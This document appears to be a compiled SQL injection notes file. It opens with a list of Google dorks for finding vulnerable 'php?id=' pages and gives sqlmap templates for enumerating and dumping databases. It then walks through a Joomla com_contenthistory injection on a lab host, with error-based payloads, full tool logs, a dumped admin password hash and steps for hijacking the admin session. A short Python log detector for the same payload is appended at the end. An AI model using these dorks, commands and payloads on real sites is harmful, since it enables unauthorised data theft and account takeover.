inurl:loadpsb.php?id=
inurl:transcript.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:channel_id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:material.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:prod_detail.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
EXAMPLE
.php?id=101
sqlmap
python sqlmap.py -u "target_url" --dbs
python sqlmap.py -u "target_url" -D database_name --tables
python sqlmap.py -u "target_url" -D database_name -T table_name --columns
python sqlmap.py -u "target_url" -D database_name -T table_name -C column_name --dump
sqlmap -h
To start with, we will begin with a basic command: sqlmap -u <URL to inject>
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes using --time-sec helps to speed up the process, especially when the server responses are slow.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
Enumeration of the database
Tables
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this:
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+
Columns
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
Data
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --technique=E --dbs
Obtaining the injection:
sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]
[*] information_schema
[*] JoomlaLab
[*] mysql
[*] performance_schema
[19:47:40] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[19:47:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
[*] shutting down at 19:47:40
Next we can enumerate the tables of the database:
sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[19:52:28] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:52:28] [INFO] testing MySQL
[19:52:28] [INFO] confirming MySQL
[19:52:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[19:52:28] [INFO] fetching tables for database: 'JoomlaLab'
[19:52:28] [WARNING] reflective value(s) found and filtering out
[19:52:28] [INFO] the SQL query used returns 68 entries
[19:52:28] [INFO] starting 10 threads
[19:52:29] [INFO] retrieved: q9741_banner_tracks
[19:52:29] [INFO] retrieved: q9741_assets
[19:52:29] [INFO] retrieved: q9741_categories
[19:52:29] [INFO] retrieved: q9741_banner_clients
[19:52:29] [INFO] retrieved: q9741_associations
[19:52:29] [INFO] retrieved: q9741_banners
[19:52:29] [INFO] retrieved: q9741_contact_details
[19:52:29] [INFO] retrieved: q9741_content_frontpage
[19:52:29] [INFO] retrieved: q9741_content
[19:52:29] [INFO] retrieved: q9741_content_rating
| q9741_finder_links_terms7 |
| q9741_finder_links_terms8 |
| q9741_finder_links_terms9 |
| q9741_finder_links_termsa |
| q9741_finder_links_termsb |
| q9741_finder_links_termsc |
| q9741_finder_links_termsd |
| q9741_finder_links_termse |
| q9741_finder_links_termsf |
| q9741_finder_taxonomy |
| q9741_finder_taxonomy_map |
| q9741_finder_terms |
| q9741_finder_terms_common |
| q9741_finder_tokens |
| q9741_finder_tokens_aggregate |
| q9741_finder_types |
| q9741_languages |
| q9741_menu |
| q9741_menu_types |
| q9741_messages |
| q9741_messages_cfg |
| q9741_modules |
| q9741_modules_menu |
| q9741_newsfeeds |
| q9741_overrider |
| q9741_postinstall_messages |
| q9741_redirect_links |
| q9741_schemas |
| q9741_session |
| q9741_tags |
| q9741_template_styles |
| q9741_ucm_base |
| q9741_ucm_content |
| q9741_ucm_history |
| q9741_update_sites |
| q9741_update_sites_extensions |
| q9741_updates |
| q9741_user_keys |
| q9741_user_notes |
| q9741_user_profiles |
| q9741_user_usergroup_map |
| q9741_usergroups |
| q9741_users |
| q9741_viewlevels |
| q9741_weblinks |
+-------------------------------+
[19:52:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 72 times
[19:52:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
[*] shutting down at 19:52:30
root@KaliVB:~#
Next one can take the classic route and dump the users table in order to crack the password hash:
sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]
[sqlmap banner] sqlmap {1.0-dev-nongit-20151024} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage
caused by this program
[*] starting at 21:00:11
[21:00:11] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:00:11] [INFO] testing connection to the target URL
[21:00:11] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[select] (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=(SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9327=9327,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[21:00:11] [INFO] testing MySQL
[21:00:11] [INFO] confirming MySQL
[21:00:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[21:00:11] [INFO] fetching columns for table 'q9741_users' in database 'JoomlaLab'
(the single row returned is shown transposed, one column per line)
+---------------+--------------------------------------------------------------+
| column        | value                                                        |
+---------------+--------------------------------------------------------------+
| id            | 601                                                          |
| name          | Super User                                                   |
| otep          | <blank>                                                      |
| email         | correo@gmail.com                                             |
| block         | 0                                                            |
| otpKey        | <blank>                                                      |
| params        | <blank>                                                      |
| username      | alberto                                                      |
| password      | $2y$10$SD20rJFbG7QEXyfMaw9IC.yRigW2NwZ2RVZzbFlNJ1/cDTsC9DL2y |
| sendEmail     | 1                                                            |
| activation    | 0                                                            |
| resetCount    | 0                                                            |
| registerDate  | 2015-10-24 16:11:53                                          |
| lastResetTime | 0000-00-00 00:00:00                                          |
| lastvisitDate | 2015-10-24 16:16:32                                          |
+---------------+--------------------------------------------------------------+
[21:00:12] [INFO] table 'JoomlaLab.q9741_users' dumped to CSV file '/root/.sqlmap/output/127.0.0.1/dump/JoomlaLab/q9741_users.csv'
[21:00:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 50 times
[21:00:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
[*] shutting down at 21:00:12
But going one step further, what Trustwave do to skip the tedious process of cracking the password is to query the *_session table and take the administrator's authentication token in order to perform a session hijack.
Refresh the browser
Modify the cookie with the session_id value
Session hijacking
It is clear how simple it is to exploit this vulnerability. The recommendation is to update as soon as possible to the latest version, which fixes this vulnerability, and to wait for November, when the revamped version 3.5 will be released.
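As an added example, not part of the original write-up, here is a small Python detector that parses constructed Apache access-log lines, URL-decodes the query string and flags the error-based signature seen in the sqlmap output above (the FLOOR(RAND(0)*2) ... GROUP BY trick, or a SELECT smuggled into list[select]), while counting the HTTP 500 responses per client that the run above produced in bursts. The log format, timestamps and client IPs are assumptions.

```python
import re
from collections import Counter
from urllib.parse import quote, unquote_plus
# The two list[select] payloads sqlmap reported in the walkthrough above.
PAYLOAD_A = ("' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(5490=5490,1))),"
             "0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")
PAYLOAD_B = ("(SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9327=9327,1))),"
             "0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)")
BASE = "option=com_contenthistory&view=history&item_id=1&list%5Bselect%5D="

def log_line(ip, query, status):
    # Constructed Apache combined-format entry (sample data, not taken from the page)
    return (f'{ip} - - [24/Oct/2015:19:52:29 +0200] "GET /Joomla/index.php?{query} HTTP/1.1" '
            f'{status} 1543 "-" "Mozilla/5.0"')

SAMPLE_LOG = "\n".join([
    log_line("10.0.0.5", BASE + quote(PAYLOAD_A, safe=""), 500),
    log_line("10.0.0.5", BASE + quote(PAYLOAD_B, safe=""), 500),
    log_line("192.168.1.20", "option=com_content&view=article&id=1", 200),
])
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# MySQL error-based signature used above: FLOOR(RAND(0)*2) duplicate-key trick followed by GROUP BY.
ERROR_BASED_RE = re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S)
# list[select] should only ever carry column names, never a SELECT of its own.
LIST_SELECT_RE = re.compile(r"list\[select\]=([^&]*)", re.I)

def parse_line(line):
    """Return {'ip', 'path', 'status'} for one access-log line, or None if it does not parse."""
    if not (m := LOG_RE.match(line)):
        return None
    path = unquote_plus(m.group("path"))  # decode so the SQL text becomes visible
    return {"ip": m.group("ip"), "path": path, "status": int(m.group("status"))}

def is_suspicious(path):
    """True if the decoded request matches the error-based pattern or puts a SELECT in list[select]."""
    if ERROR_BASED_RE.search(path):
        return True
    m = LIST_SELECT_RE.search(path)
    return bool(m and re.search(r"\bSELECT\b", m.group(1), re.I))

def analyse(log_text):
    """Return (suspicious_records, http_500_count_per_ip); bursts of 500s per client are the tell-tale."""
    hits, errors = [], Counter()
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        if rec["status"] == 500:
            errors[rec["ip"]] += 1
        if is_suspicious(rec["path"]):
            hits.append(rec)
    return hits, errors
```

Run analyse() over a real access log and alert on any client that both produces flagged requests and accumulates 500s, which is exactly the footprint the sqlmap runs above left (72 and 50 errors respectively).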